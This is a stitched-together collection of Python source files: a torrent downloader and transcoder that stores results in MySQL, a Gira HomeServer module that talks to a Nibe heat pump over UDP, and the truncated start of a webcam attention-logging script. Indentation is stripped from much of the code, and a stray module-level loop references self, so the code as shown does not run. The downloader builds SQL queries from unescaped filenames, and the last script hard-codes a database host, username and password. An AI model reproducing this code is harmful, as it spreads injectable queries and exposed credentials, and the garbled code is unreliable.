print 'set_hashlist_status insert'
total_size = self.get_bt_size(torrent)
sname = torrent['name']
sname = mdb.escape_string(sname)
return self.execute("insert into pl_hash_list (`name`,`info_hash`,`length`,`status`,`create_time`) values('" +
sname + "','" + shash + "','" + total_size + "','" + str(status) + "','" + ct + "')")
# Return the pl_hash_file id for (fname, pid), inserting the row with its
# m3u8 name when missing. NOTE(review): fname/m3u8_name are concatenated
# into SQL unescaped.
def get_hashfile_id(self, fname, m3u8_name, pid):
ct = formatTime()
info = self.query(
"select id from pl_hash_file where name='" + fname + "' and pid='" + str(pid) + "'")
if len(info) == 0:
print 'insert into pl_hash_file data !'
fid = self.execute("insert into pl_hash_file (`pid`,`name`,`m3u8`,`create_time`) values('" +
str(pid) + "','" + fname + "','" + m3u8_name + "','" + ct + "')")
else:
print fname, ':', m3u8_name, 'already is exists!'
fid = str(info[0][0])
return fid
# Store the AES playlist key for the given pl_hash_file row id.
def set_hashfile_key(self, fid, key):
self.execute("update pl_hash_file set `key`='" +
mdb.escape_string(key) + "' where id=" + fid)
# Enqueue an over-limit torrent (by info_hash) into pl_hash_queue for
# later re-download; no-op when the hash is already queued.
def add_queue(self, shash, size):
ct = formatTime()
info = self.query(
"select id from pl_hash_queue where info_hash='" + shash + "'")
if len(info) == 0:
sql = "insert into pl_hash_queue (`info_hash`,`length`,`created_at`,`updated_at`) values('" + \
shash + "','" + str(size) + "','" + ct + "','" + ct + "')"
return self.execute(sql)
else:
print 'queue:', shash, 'already is exists!'
# Register a finished file: ensure a pl_hash_list row exists for the
# current torrent, then ensure a pl_hash_file row for this file.
# Returns the file row id (0 when the list insert failed).
def add_hash(self, fname, m3u8_name):
print '-------------------------add_hash---start-----------------------'
pid = self.get_hashlist_id()
fid = 0
if pid:
fid = self.get_hashfile_id(fname, m3u8_name, pid)
print '-------------------------add_hash---end--------------------------'
return fid
def file_arr(self, path, filters=('.DS_Store',)):
    """Recursively collect regular files under *path*.

    Args:
        path: directory to walk.
        filters: basenames to exclude. BUG FIX: the default was a mutable
            list (['.DS_Store']) -- a classic shared-default pitfall; a
            tuple accepts the same membership test without the hazard.

    Returns:
        Flat list of file paths (os.path.join of *path* and entry names).
    """
    file_list = []
    for name in os.listdir(path):
        # '.unwanted' is the download-cache dir for deselected files.
        if name == '.unwanted' or name in filters:
            continue
        file_path = os.path.join(path, name)
        if os.path.isdir(file_path):
            # Recurse into sub-directories and flatten the result.
            file_list.extend(self.file_arr(file_path, filters))
        else:
            file_list.append(file_path)
    return file_list
def find_dir_video(self, path):
    """Return every video file found (recursively) under *path*.

    Idiom fix: replaces the index-based accumulation loop with a list
    comprehension; traversal stays in file_arr(), filtering in is_video().
    """
    return [f for f in self.file_arr(path) if self.is_video(f)]
def video_do(self, path):
    """Transcode *path*: a single file when it is a video, otherwise every
    video found below the directory. Always returns ''."""
    if not os.path.isfile(path):
        for candidate in self.find_dir_video(path):
            self.ffmpeg(candidate)
    elif self.is_video(path):
        self.ffmpeg(path)
    return ''
def is_video(self, path):
    """True if *path*'s extension is listed in self.has_suffix.

    Idiom fix: the `in` test already yields the boolean; the original
    `if ... return True / return False` ladder was redundant.
    """
    return os.path.splitext(path)[1] in self.has_suffix
# Deprioritize (priority 0 = skip) every non-video file of *torrent*.
# If the torrent contains no video at all, mark it status 1 (which also
# deletes it unless TASK_DEBUG).
def non_download(self, torrent):
flist = self.qb.get_torrent_files(torrent['hash'])
is_video = False
for pos in range(len(flist)):
file = torrent['save_path'] + flist[pos]['name']
if not self.is_video(file):
self.qb.set_file_priority(torrent['hash'], pos, 0)
else:
is_video = True
# is video
if not is_video:
self.set_status(torrent, 1)
# Persist *status* for the torrent, then (outside debug mode and for any
# non-zero status) remove the torrent and its data from qBittorrent.
def set_status(self, torrent, status):
self.set_hashlist_status(torrent, status)
if TASK_DEBUG == 0 and status != 0:
self.qb.delete_permanently(torrent['hash'])
def is_downloading(self, torrent):
    """True while the torrent's display name still equals its info-hash,
    i.e. magnet metadata has not been resolved yet.

    Idiom fix: return the comparison directly instead of the
    `if/else return True/False` ladder.
    """
    return torrent['name'] == torrent['hash']
# Detect a stalled torrent: status 2 when metadata never arrived within
# *sec* seconds, status 3 when metadata arrived but no video file has made
# progress within *sec* seconds. Returns True when the torrent was failed.
def is_nondownload_overtime(self, torrent, sec):
ct = time.time()
use_time = int(ct) - int(torrent['added_on'])
flist = self.qb.get_torrent_files(torrent['hash'])
# print flist
flist_len = len(flist)
# Torrent metadata (file list) not fetched yet.
# print 'ddd:',flist_len,use_time,sec
if flist_len == 0 and use_time > sec:
self.set_status(torrent, 2)
return True
is_video_download = False
# Metadata fetched, but check whether any video file started downloading.
for pos in range(len(flist)):
file = torrent['save_path'] + flist[pos]['name']
if self.is_video(file):
# NOTE(review): 'progress' is compared against the *string* '0';
# if the qBittorrent API returns a number, this is always != '0'
# and every video counts as downloading -- verify against the API.
if flist[pos]['progress'] != '0':
is_video_download = True
if not is_video_download and use_time > sec:
self.set_status(torrent, 3)
return True
return False
def is_downloading_overtime(self, torrent, sec):
    """Mark the torrent failed (status 4) and report True when it has been
    downloading for longer than *sec* seconds since 'added_on'."""
    elapsed = int(time.time()) - int(torrent['added_on'])
    if elapsed <= sec:
        return False
    self.set_status(torrent, 4)
    return True
def is_downloading_overlimit(self, torrent):
sz = self.get_bt_size(torrent)
ct = formatTime()
size_limit = float(TASK_SIZE_LIMIT) * 1024 * 1024 * 1024
size_limit = int(size_limit)
print 'is_downloading_overlimit:', toSize(sz), toSize(size_limit)
if int(sz) > int(size_limit):
print 'overlimit sz:' + sz
self.add_queue(torrent['hash'], str(sz))
self.qb.delete_permanently(torrent['hash'])
# Worker loop (runs on its own thread): every TASK_RATE seconds, inspect
# all 'downloading' torrents and apply, in order: stalled-metadata check,
# 7-day timeout, magnet-resolution wait, size-limit check; otherwise
# deprioritize the torrent's non-video files.
def check_task(self):
while True:
self.__check()
torrents = self.qb.torrents(filter='downloading')
tlen = len(torrents)
if tlen > 0:
print "downloading torrents count:", tlen
for torrent in torrents:
if self.is_nondownload_overtime(torrent, 5 * 60):
pass
elif self.is_downloading_overtime(torrent, 7 * 24 * 60 * 60):
pass
elif self.is_downloading(torrent):
pass
elif self.is_downloading_overlimit(torrent):
pass
else:
self.non_download(torrent)
print torrent['name'], ' task downloading!'
else:
print self.debug("no downloading task!")
time.sleep(TASK_RATE)
def completed(self):
while True:
self.__check()
torrents = self.qb.torrents(filter='completed')
if not torrents:
continue
tlen = len(torrents)
print "completed torrents count:", tlen
if tlen > 0:
for torrent in torrents:
self.sign_torrent = torrent
path = torrent['save_path'] + torrent['name']
path = path.encode()
try:
self.video_do(path)
hash_dir = self.get_transfer_hash_dir(torrent['hash'])
if TASK_DEBUG == 0:
self.ffmpeg_del_hfile(hash_dir)
self.qb.delete_permanently(torrent['hash'])
except Exception as e:
print formatTime(), str(e)
print self.debug("done task!")
else:
print self.debug("no completed task!")
time.sleep(TASK_COMPLETED_RATE)
# Re-submit a queued info-hash to qBittorrent as a magnet link.
def add_hash_task(self, shash):
url = 'magnet:?xt=urn:btih:' + shash
self.qb.download_from_link(url)
print self.debug('queue add_hash_task is ok ... ')
# Worker loop: when QUEUE_SWITCH is on, top up qBittorrent's active-slot
# budget from pl_hash_queue (optionally restricted/ordered by size when a
# TASK_SIZE_LIMIT is configured), then delete each dispatched row.
# NOTE(review): SQL built by concatenation; values here are internal
# (limits/ids) but parameterization would still be safer.
def queue(self):
while True:
if QUEUE_SWITCH == '1':
print self.debug("------------ do queue task start! ---------------")
setting = self.qb.preferences()
torrents = self.qb.torrents()
tlen = len(torrents)
# print tlen, setting['max_active_torrents']
add = int(setting['max_active_torrents']) - tlen
if add == 0:
print self.debug('the download queue is full ... ')
else:
size_limit = float(TASK_SIZE_LIMIT) * 1024 * 1024 * 1024
size_limit = int(size_limit)
size_sql_where = ''
size_sql = ''
if size_limit != 0:
size_sql = ',`length` desc '
size_sql_where = 'where `length`<=' + str(size_limit)
sql = "select * from pl_hash_queue " + size_sql_where + \
" order by created_at desc " + \
size_sql + " limit " + str(add)
info = self.query(sql)
info_len = len(info)
if info_len == 0:
print self.debug('queue data is empty ... ')
else:
for x in range(info_len):
# Column 1 is info_hash, column 0 is the row id.
self.add_hash_task(info[x][1])
self.execute(
'delete from pl_hash_queue where id=' + str(info[x][0]))
print self.debug("------------ do queue task end ! ---------------")
time.sleep(TASK_RATE)
def test():
while True:
print self.debug("no download task!")
time.sleep(1)
test()
# Entry point: start the three worker loops (downloading checker,
# completed-torrent transcoder, queue dispatcher) on daemon-less threads.
if __name__ == "__main__":
dl = downloadBT()
# NOTE(review): local import -- presumably redundant if threading is
# already imported at the top of this module; verify and remove.
import threading
check_task = threading.Thread(target=dl.check_task)
check_task.start()
completed = threading.Thread(target=dl.completed)
completed.start()
queue = threading.Thread(target=dl.queue)
queue.start()
|
14107_NibeWP (14107).py | # coding: UTF-8
# Copyright 2021 T. Paul</p>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import json
import socket
import threading
import urllib2
##!!!!##################################################################################################
#### Own written code can be placed above this commentblock . Do not change or delete commentblock! ####
########################################################################################################
##** Code created by generator - DO NOT CHANGE! **##
class NibeWP_14107_14107(hsl20_4.BaseModule):
# Gira HomeServer logic module that talks to a Nibe heat pump via a
# UDP gateway: decodes incoming register frames and sends read/write
# register commands.
def __init__(self, homeserver_context):
hsl20_4.BaseModule.__init__(self, homeserver_context, "14107_NibeWP")
self.FRAMEWORK = self._get_framework()
self.LOGGER = self._get_logger(hsl20_4.LOGGING_NONE,())
# Input pins: gateway address/ports, HS listen port, command strings,
# and up to 20 register-number subscriptions (REG01..REG20).
self.PIN_I_S_GWIP=1
self.PIN_I_N_GWPORTGET=2
self.PIN_I_N_GWPORTSET=3
self.PIN_I_N_HSPORT=4
self.PIN_I_S_CMDSET=5
self.PIN_I_S_CMDGET=6
self.PIN_I_S_REG01=7
self.PIN_I_S_REG02=8
self.PIN_I_S_REG03=9
self.PIN_I_S_REG04=10
self.PIN_I_S_REG05=11
self.PIN_I_S_REG06=12
self.PIN_I_S_REG07=13
self.PIN_I_S_REG08=14
self.PIN_I_S_REG09=15
self.PIN_I_S_REG10=16
self.PIN_I_S_REG11=17
self.PIN_I_S_REG12=18
self.PIN_I_S_REG13=19
self.PIN_I_S_REG14=20
self.PIN_I_S_REG15=21
self.PIN_I_S_REG16=22
self.PIN_I_S_REG17=23
self.PIN_I_S_REG18=24
self.PIN_I_S_REG19=25
self.PIN_I_S_REG20=26
# Output pins: JSON value blob, pump model/version, per-register
# numeric outputs (REG01..REG20) and an alive indicator.
self.PIN_O_S_VALUES=1
self.PIN_O_S_MODEL=2
self.PIN_O_N_VER=3
self.PIN_O_N_GETREG=4
self.PIN_O_N_REG01=5
self.PIN_O_N_REG02=6
self.PIN_O_N_REG03=7
self.PIN_O_N_REG04=8
self.PIN_O_N_REG05=9
self.PIN_O_N_REG06=10
self.PIN_O_N_REG07=11
self.PIN_O_N_REG08=12
self.PIN_O_N_REG09=13
self.PIN_O_N_REG10=14
self.PIN_O_N_REG11=15
self.PIN_O_N_REG12=16
self.PIN_O_N_REG13=17
self.PIN_O_N_REG14=18
self.PIN_O_N_REG15=19
self.PIN_O_N_REG16=20
self.PIN_O_N_REG17=21
self.PIN_O_N_REG18=22
self.PIN_O_N_REG19=23
self.PIN_O_N_REG20=24
self.PIN_O_N_ALIVE=25
########################################################################################################
#### Own written code can be placed after this commentblock . Do not change or delete commentblock! ####
###################################################################################################!!!##
# Class-level defaults; on_init() rebinds them per instance.
# NOTE(review): g_register/g_out are *mutable class attributes* and would
# be shared across instances until on_init() runs -- verify single-instance
# usage in the HomeServer runtime.
g_msg = 0
g_register = {}
g_out = {}
debug_only = False
g_bigendian = False
# Re-ordering / inversing the byte order
def shift_bytes(self, msg):
    """Return *msg*'s elements as a list in reversed (endian-swapped)
    order.

    Idiom fix: list(reversed(...)) replaces the manual slice-and-append
    loop; the result is identical (a plain list, regardless of whether
    *msg* is a list or bytearray).
    """
    return list(reversed(msg))
# Main server loop, listening for incomming messages
# Main server loop, listening for incomming messages
def listen(self):
# Blocking UDP receive loop (runs on its own thread, see on_init):
# accumulates received bytes until chk_msg() reports a complete, valid
# frame, then hands it to parse_data().
# NOTE(review): recv() on a datagram socket returns one datagram per
# call; the accumulation across calls assumes frames may be split over
# datagrams -- confirm against the gateway's behavior.
# declare our serverSocket upon which
# we will be listening for UDP messages
server_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# One difference is that we will have to bind our declared IP address
# and port number to our newly declared server_sock
UDP_IP_ADDRESS = self.FRAMEWORK.get_homeserver_private_ip()
UDP_PORT_NO = self._get_input_value(self.PIN_I_N_HSPORT)
self.DEBUG.add_message("listen: Start listening for incoming msgs at "
+ str(UDP_IP_ADDRESS) + ":" + str(UDP_PORT_NO))
try:
server_sock.bind((UDP_IP_ADDRESS, UDP_PORT_NO))
data = ""
while True:
data = data + server_sock.recv(1024)
msg, ret = self.chk_msg(data)
if ret:
self.parse_data(msg)
data = ""
else:
# chk_msg returns None on checksum failure: drop the buffer.
if msg is None:
data = ""
except Exception as e:
self.DEBUG.add_message("ERROR listen: " + str(e) + " (abort)")
finally:
server_sock.close()
# Reads the Modbus Manager export file which is provided to the HS,
# see HS help for "hsupload"
# Reads the Modbus Manager export file which is provided to the HS,
# see HS help for "hsupload"
def read_export(self):
# Fetches the CSV from the HomeServer's local HTTP endpoint and feeds
# it to parse_export(). Errors are logged, not raised.
try:
target_url = 'http://127.0.0.1:65000/logic/14107/export.csv'
datafile = urllib2.urlopen(target_url)
self.parse_export(datafile)
except Exception as e:
self.DEBUG.add_message("ERROR readExport: " + str(e))
# Parses the Modbus Manager export file and stores the content to self.g_register
# Parses the Modbus Manager export file and stores the content to self.g_register
def parse_export(self, datafile):
# Builds self.g_register: {register_id(int): {Title, Size, Factor, Mode}}.
# Rows with fewer than 10 semicolon-separated fields are skipped; bad
# rows are logged and do not abort the parse.
# print("Running parseExport")
self.g_register = {}
i = 0
for row in datafile:
row = row.replace('"', '')
data = row.split(';')
if len(data) < 10:
continue
# Title;Info;ID;Unit;Size;Factor;Min;Max;Default;Mode
# 0 1 2 3 4 5 6 7 8 9
try:
self.g_register[int(data[2])] = {"Title": data[0], "Size": data[4], "Factor": float(data[5]),
"Mode": data[9]}
i = i + 1
except Exception as e:
self.DEBUG.add_message("parseExport: " + str(e) + " with '" + str(data) + "'")
self.DEBUG.add_message("parseExport: Read Modbus Manager file with " + str(i) + " entries.")
# Checks the integrity of a received message
# Example:
# 5c 00 20 6d 0e 01 24 18 46 31 31 34 35 2d 31 30 20 44 45 34
# |---------- Bytes vor len count --------|
# |------------ Bytes for checksum calculation -------|
def chk_msg(self, msg):
# Validate a raw frame: locate the 0x5c start byte, check the declared
# payload length is fully buffered, then verify the XOR checksum.
# Returns (frame-without-start-byte, True) when complete and valid,
# (partial, False) when more bytes are needed, (None, False) on a
# checksum mismatch (caller drops its buffer).
try:
# print("Running chkMsg")
in_msg = bytearray(msg)
out_msg = []
# check for start byte
for i in range(len(in_msg)):
if (in_msg[i] == 0x5c) and (i < len(in_msg) - 1):
out_msg = in_msg[i + 1:]
break
# check if msg is complete
if len(out_msg) < 4:
return out_msg, False
msg_len = int(out_msg[3])
cnt_len = len(out_msg[4:-1])
if cnt_len < msg_len:
return out_msg, False
# Trim any trailing bytes beyond this frame (header + payload + crc).
out_msg = out_msg[:4 + msg_len + 1]
# check checksum
msg_chk_sm = out_msg[msg_len + 4]
chksm = self.calc_chk_sm(out_msg[:-1])
if chksm != msg_chk_sm:
self.DEBUG.add_message("chkMsg: Checksum error")
self.DEBUG.set_value("Last failed msg", self.print_byte_array(in_msg))
return None, False
return out_msg, True
except Exception as e:
# NOTE(review): this path returns None (a single value, not a
# 2-tuple) -- the caller unpacks two values and would raise.
self.DEBUG.add_message("ERROR chkMsg: " + str(e))
# Calculates XOR checksum
def calc_chk_sm(self, msg):
    """XOR-fold every byte of *msg* into the protocol's one-byte
    checksum."""
    checksum = 0x00
    for byte in msg:
        checksum ^= byte
    return checksum
# Parses the data block of an incoming message
# Parses the data block of an incoming message
def parse_register(self, data, cmd6a=False):
# Walks (register, value) pairs: 2 bytes register id, then a value
# whose width/signedness comes from the export table (forced to 32-bit
# for 0x6a single-register replies). Builds {str(reg): {Title, value}}
# and forwards changed values to their mapped output pins.
try:
reg = 0
res = {}
i = 0
while i < len(data):
# register
reg = self.hex2int(data[i: i + 2])
# self.DEBUG.add_message("Register received: " + str(self.printByteArray(data[i: i + 2]) + " ~ " + str(reg)))
# reg = 0xffff -> skip and following data
if reg == 65535 or reg == 0:
# print("- Next register 0xffff or 0x0, skipping 4 byte")
i = i + 4
continue
i = i + 2
if reg not in self.g_register:
self.DEBUG.add_message("Register " + str(reg) + " not known. Abort parse.")
return False, res
# value
size = self.g_register[reg]["Size"]
if cmd6a:
size = size[0] + "32"
factor = self.g_register[reg]["Factor"]
# 8-bit values are transmitted in a 2-byte slot like 16-bit ones;
# the sign bit check picks two's-complement decoding for s8/s16.
if (size == "s8") or (size == "u8"):
if (data[i + 1] & 0x80 == 0x80) and (size == "s8"):
val = self.complement2(data[i:i + 2]) / factor
else:
val = self.hex2int(data[i:i + 2]) / factor
i = i + 2
elif (size == "s16") or (size == "u16"):
if (data[i + 1] & 0x80 == 0x80) and (size == "s16"):
val = self.complement2(data[i:i + 2]) / factor
else:
val = self.hex2int(data[i:i + 2]) / factor
i = i + 2
elif (size == "s32") or (size == "u32"):
# check next register
reg_next = self.hex2int(data[i + 2:i + 4])
if reg_next - reg == 1:
# print("- next register is split register")
# x32 uses next register for full value
val1 = data[i:i + 2]
i = i + 4
val2 = data[i:i + 2]
# NOTE(review): BUG -- bytearray.append() returns None (and
# expects an int, not a bytearray), so data32 is never the
# combined value; split 32-bit registers cannot parse. The
# intent appears to be `val1 + val2` (or extend + use val1).
data32 = val1.append(val2)
val = self.hex2int(data32) / factor
# print("- Value: " + str(val))
i = i + 2
else:
# print("- next register is 0xffff, skip")
val = self.hex2int(data[i:i + 2]) / factor
# print("- Value: " + str(val))
i = i + 6
else:
# NOTE(review): 'val' stays unbound here; the assignments
# below would raise (caught by the outer except).
self.DEBUG.add_message("ERROR parseRegister: size of value unknown.")
# write value
res[str(reg)] = {}
res[str(reg)]["Title"] = self.g_register[reg]["Title"]
res[str(reg)]["value"] = val
# Forward to the mapped output pin, but only on value change.
if "out" in self.g_register[reg]:
out_pin = self.g_register[reg]["out"]
if out_pin != 0:
if "Value" in self.g_register[reg]:
if self.g_register[reg]["Value"] != val:
self._set_output_value(out_pin, val)
self.g_register[reg]["Value"] = val
else:
self._set_output_value(out_pin, val)
self.g_register[reg]["Value"] = val
return True, res
except Exception as e:
self.DEBUG.add_message("ERROR parseRegister: " + str(e))
return False, None
def parse_data(self, msg):
# Dispatch a validated frame by its command byte (msg[2]):
#   0x68 periodic 20-register data, 0x6a single-register reply (32-bit),
#   0x6c command ack (ignored), 0x6d version/model info, 0xee status.
try:
# sender = msg[0]
# addr = msg[1]
cmd = msg[2]
# length = msg[3]
data = msg[4:-2]
# crc = msg[-1]
self.DEBUG.set_value("last raw msg " + str(hex(cmd)),
str(hex(0x5c)) + " " + self.print_byte_array(msg))
# remove escaping of startbyte 0x5c
# (the wire protocol doubles 0x5c inside payloads; collapse pairs)
i = 0
while i < len(data) - 1:
if (data[i] == 0x5c) and (data[i + 1] == 0x5c):
data.pop(i)
print("- Removed 0x5c escaping")
i = i + 1
# 20 value register msg
if cmd == 0x68:
ok, ret = self.parse_register(data)
if not ok:
self.DEBUG.add_message("Error reading msg " + str(hex(0x5c)) + " " + self.print_byte_array(msg))
return None
jsn = str(ret).replace("'", '"') # exchange ' by "
self._set_output_value(self.PIN_O_S_VALUES, jsn)
self._set_output_value(self.PIN_O_N_ALIVE, 1)
self.DEBUG.add_message("parse_data: Received 0x68 Nibe data")
return jsn
# response for single register request
elif cmd == 0x6a:
# @todo value always 32bit!
ok, ret = self.parse_register(data, True)
if not ok:
self.DEBUG.add_message("Error reading msg " + str(hex(0x5c)) + " " + self.print_byte_array(msg))
return None
jsn = str(ret).replace("'", '"') # exchange ' by "
self._set_output_value(self.PIN_O_S_VALUES, jsn)
self.DEBUG.add_message("parse_data: Received 0x6a Nibe data")
return jsn
# ignore, seems to be a confirmation of an executed command
# 5c00206c01014c
elif cmd == 0x6c: # and $msg eq "5c00206c01014c") {
pass
# print("- Msg 0x6c not implemented")
# readingsBulkUpdate
elif cmd == 0x6d: # and substr($msg, 10, 2*$length) =~ m/(.{2})(.{4})(.*)/) {
# ver = self.hex2int(data[0:3])
ver = self.hex2int(data[1:3])
prod = data[3:]
self._set_output_value(self.PIN_O_N_VER, ver)
self._set_output_value(self.PIN_O_S_MODEL, prod)
self.DEBUG.add_message("parse_data: Received 0x6d Nibe data")
return str(str(prod) + " / " + str(ver))
# 0x5c 0x0 0x20 0xee 0x0 0xce
elif cmd == 0xee:
self.DEBUG.add_message("parse_data: Received 0xee Nibe data")
else:
pass
self.DEBUG.add_message("parse_data: Received unknown Nibe data")
except Exception as e:
self.DEBUG.add_message("ERROR parse_data: " + str(e) + " with msg " + self.print_byte_array(msg))
def int2hex(self, value, size):
    """Encode *value* little-endian as a string of chr() bytes.

    's8'/'u8'/'s16'/'u16' produce 2 characters (8-bit sizes intentionally
    keep the historical 2-byte wire encoding); 's32'/'u32' produce 4.
    The duplicated per-size branches of the original are consolidated
    into one shift-and-mask loop.

    Raises:
        ValueError: for an unknown *size* (BUG FIX: the original fell
            through to `return val` with `val` unbound, raising a
            confusing UnboundLocalError/NameError instead).
    """
    if size in ("s8", "u8", "s16", "u16"):
        width = 2
    elif size in ("s32", "u32"):
        width = 4
    else:
        raise ValueError("int2hex: unknown size %r" % (size,))
    return ''.join(chr((value >> (8 * i)) & 0xFF) for i in range(width))
def send_data(self, port, data):
# Send one UDP datagram with *data* to the gateway (PIN_I_S_GWIP:*port*)
# and log the send; warns when fewer bytes than provided went out.
ipaddr = str(self._get_input_value(self.PIN_I_S_GWIP))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
# connect the socket, think of it as connecting the cable to the address location
s.connect((ipaddr, port))
len_send = s.send(data)
s.close()
# print("len_send = " + str(len_send) + "; len(data) = " + str(len(data)))
self.DEBUG.add_message("Msg. send to Nibe")
if len_send != len(data):
self.DEBUG.add_message("ERROR Size of data send != size of data provided in send_data")
self.DEBUG.set_value("Last send",
self.print_byte_array(bytearray(data)) + " to " + ipaddr + ":" + str(port))
def read_register(self, register):
# Build and send a 0x69 read-register frame:
#   header "\xc0\x69\x02" + register (u16 LE) + XOR checksum,
# to the gateway's "get" port.
try:
msg = "\xc0\x69\x02"
reg = self.int2hex(register, "u16")
msg = msg + reg
chksm = self.calc_chk_sm(bytearray(msg))
msg = msg + chr(chksm)
port = int(self._get_input_value(self.PIN_I_N_GWPORTGET))
self.send_data(port, msg)
except Exception as e:
self.DEBUG.add_message("ERROR readRegister: " + str(e))
def write_register(self, register, value):
# Build and send a 0x6b write-register frame (register u16 LE + scaled
# value u32 LE + checksum) to the gateway's "set" port. Registers whose
# export Mode lacks W/w are refused.
try:
msg = "\xc0\x6b\x06"
reg = self.int2hex(int(register), "u16")
msg = msg + reg
# Read-only guard; checked before anything is actually sent.
mode = self.g_register[register]["Mode"]
if ("W" not in mode) and ("w" not in mode):
self.DEBUG.add_message("write_register: Register " + str(register) + " is read only. Aborting send.")
return
# Apply the export's scaling factor before encoding.
factor = self.g_register[register]["Factor"]
value = int(value * factor)
# size = self.g_register[register]["Size"]
value = self.int2hex(value, "u32") # u32
# NOTE(review): dead code -- int2hex(..., "u32") always returns 4
# characters, so this padding loop never runs.
while len(value) < 4:
value = "\x00" + value
msg = msg + value
chksm = self.calc_chk_sm(bytearray(msg))
msg = msg + chr(chksm)
port = int(self._get_input_value(self.PIN_I_N_GWPORTSET))
self.send_data(port, msg)
except Exception as e:
self.DEBUG.add_message("ERROR write_register: " + str(e))
def print_byte_array(self, data):
    """Render *data* as space-separated hex literals, e.g. '0x5c 0x0 0x20'.

    Idiom fix: str.join replaces the quadratic concatenate-then-strip
    loop of the original; output is identical (including '' for empty
    input).
    """
    return " ".join(hex(b) for b in data)
def hex2int(self, msg):
    """Fold the byte sequence *msg* into an unsigned integer.

    When the module is configured little-endian (the default), the bytes
    are reversed first so the accumulation below always runs big-endian.
    Raises IndexError on an empty sequence, exactly like the original.
    """
    if not self.g_bigendian:
        msg = self.shift_bytes(msg)
    result = msg[0]
    for byte in msg[1:]:
        result = (result << 8) | byte
    return int(result)
# data shall not yet be re-ordered (use orig byte order)
# data shall not yet be re-ordered (use orig byte order)
def complement2(self, data):
    """Decode *data* as a two's-complement negative number.

    NOTE: flips every byte of *data* in place as a side effect, exactly
    like the original implementation (callers pass throwaway slices).
    """
    for idx in range(len(data)):
        data[idx] = data[idx] ^ 0xFF
    return -(self.hex2int(data) + 1)
def test_endian(self):
# Diagnostic: fold the probe bytes 0x80 0x00 big-endian and log the
# result so the operator can see how this host interprets byte order.
# NOTE(review): bytearray("\x80\x00") is Python 2 only -- Python 3
# requires an encoding argument (the module targets py2: urllib2).
data = bytearray("\x80\x00")
val = 0
val = val | data[0]
for byte in data[1:]:
val = val << 8
val = val | byte
self.DEBUG.add_message(self.print_byte_array(data) + " -> " + str(val) +
" (32768 little endian, 8 big endian)")
def init_export_csv(self):
    """Load the Modbus Manager export, then wire each configured register
    input pin (REG01..REG20) to its corresponding output pin.

    BUG FIX: the original loop used range(PIN_I_S_REG20 - PIN_I_S_REG01),
    which iterates only 19 times and silently ignored the REG20 input;
    the range must include the last register pin (+ 1).
    """
    self.read_export()
    for i in range(self.PIN_I_S_REG20 - self.PIN_I_S_REG01 + 1):
        out_id = self.PIN_O_N_REG01 + i
        reg = self._get_input_value(self.PIN_I_S_REG01 + i)
        if reg == 0:
            # Pin not configured.
            continue
        if reg in self.g_register:
            self.g_register[reg]["out"] = out_id
        else:
            self.DEBUG.add_message("initExportCsv: Register " + str(reg) + " at EW" +
                                   str(self.PIN_I_S_REG01 + i) +
                                   " not defined in Mobus Manager Export.")
def on_init(self):
# Module start-up: create the debug panel, reset per-instance state,
# run the endianness diagnostic, load register definitions and start
# the UDP listener thread (skipped in debug-only mode).
self.DEBUG = self.FRAMEWORK.create_debug_section()
self.g_msg = 0
self.g_register = {}
self.g_out = {}
self.g_bigendian = False
self.test_endian()
self.init_export_csv()
x = threading.Thread(target=self.listen)
if not self.debug_only:
x.start()
def on_input_value(self, index, value):
# Pin dispatcher: CMDGET triggers a register read, CMDSET parses
# "register:value" and writes it, and any REGxx pin re-maps a register
# to the matching output pin (clearing the pin's previous mapping).
if index == self.PIN_I_S_CMDGET:
self.read_register(value)
elif index == self.PIN_I_S_CMDSET:
val = value.split(':')
register = int(val[0])
val = float(val[1])
self.write_register(register, val)
elif index >= self.PIN_I_S_REG01:
out_id = index - self.PIN_I_S_REG01 + self.PIN_O_N_REG01
# NOTE(review): g_register keys are ints parsed from the export;
# if the pin delivers *value* as a string (pin is declared S_),
# this lookup raises KeyError -- verify the runtime's pin typing.
self.g_register[value]["out"] = out_id
old_reg = 0
if out_id in self.g_out:
old_reg = self.g_out[out_id]
self.g_register[old_reg]["out"] = 0
self.g_out[out_id] = value
|
yuzbulanson.py | import sys
import threading
from cv2 import cv2 as cv
import time
import queue
import time
import mysql.connector
import datetime
from datetime import timedelta
# SECURITY NOTE(review): database host and credentials are hard-coded in
# source; move them to environment variables or a config file and rotate
# the exposed password.
mydb=mysql.connector.connect(host='94.130.57.82',user="appsplat_semih",passwd="semihsemih123",database="appsplat_semih")
mycursor =mydb.cursor()
# CLI arguments: student/user id and course/session id from the caller.
idnum=sys.argv[1]
course=sys.argv[2]
# Persist the latest attention score: blocks on q.get() until the capture
# loop publishes a value, then inserts one attentionstudent row (with the
# DB server's NOW() as the timestamp) for this session/user.
def att(q):
sqlform = "Insert into attentionstudent(sessionID,userID,min,attentionP) values(%s,%s,NOW(),%s)"
value = q.get()
print('Average attention:',value)
#formatted_date = now.strftime('%Y-%m-%d %H:%M:%S')
#print(formatted_date)
# NOTE(review): `dt` is unused (leftover from the commented-out local
# timestamp formatting above).
dt = datetime.datetime.now()
#x = dt.strftime("%Y-%m-%d %H:%M:%S")
students=[(course,idnum,value)]
mycursor.executemany(sqlform, students)
mydb.commit()
# NOTE(review): return value is never used by callers (threads).
return q
def th():
    """Spawn one reporter thread per second, 50 times, giving roughly
    50 seconds of attention logging for the session."""
    for _ in range(50):
        worker = threading.Thread(target=att, args=(q,))
        worker.start()
        time.sleep(1)
if __name__ == '__main__':
    # Attention score starts at 100 and is nudged up/down per frame by the
    # face/eye detections below.
    attention = 100
